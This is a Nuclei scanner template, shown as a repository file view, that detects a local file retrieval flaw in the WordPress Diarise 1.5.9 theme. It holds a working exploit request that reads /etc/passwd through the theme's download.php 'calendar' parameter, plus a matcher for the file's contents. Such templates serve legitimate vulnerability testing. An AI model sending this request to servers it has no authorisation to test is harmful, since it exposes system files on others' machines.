nuclei-templates/vulnerabilities/wordpress/diarise-theme-lfi.yaml

33 lines
832 B
YAML
Raw Normal View History

id: diarise-theme-lfi
2021-10-30 21:44:13 +00:00
info:
name: WordPress Diarise 1.5.9 - Arbitrary File Retrieval
2021-10-30 21:44:13 +00:00
author: 0x_Akoko
severity: high
description: WordPress Diarise theme version 1.5.9 suffers from a local file retrieval vulnerability.
2021-10-30 21:44:13 +00:00
reference:
- https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html
- https://cxsecurity.com/issue/WLB-2019050123
- https://woocommerce.com/?aff=1790
classification:
cwe-id: CWE-98
tags: packetstorm,wordpress,wp-theme,lfi
2021-10-30 21:44:13 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/04/05